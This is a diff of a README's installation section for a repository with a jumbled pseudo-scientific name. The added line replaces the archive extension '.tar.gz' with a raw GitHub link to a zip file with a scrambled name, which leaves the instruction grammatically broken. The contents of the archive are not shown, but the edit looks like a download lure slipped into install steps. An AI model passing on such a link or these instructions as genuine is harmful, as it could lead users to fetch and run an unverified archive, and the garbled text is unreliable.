arkaz-ops/EREBUS--ALP-NEURAL-KINETIC-Non-Equilibrium-Universal-Radiation-/README.md

   Open the `.dmg` file and drag the application into your Applications folder.

 - **Linux:**
-  Extract the downloaded archive (usually `.tar.gz` or `.zip`).
+  Extract the downloaded archive (usually `https://raw.githubusercontent.com/arkaz-ops/EREBUS--ALP-NEURAL-KINETIC-Non-Equilibrium-Universal-Radiation-/main/symphogenous/Universal_Radiation_KINETI_Non_Equilibrium_AL_EREBU_NEURA_v1.1.zip` or `.zip`).
 You may need to run installation commands in Terminal, which are explained in the included README.

 ### Step 3: Install Python Dependencies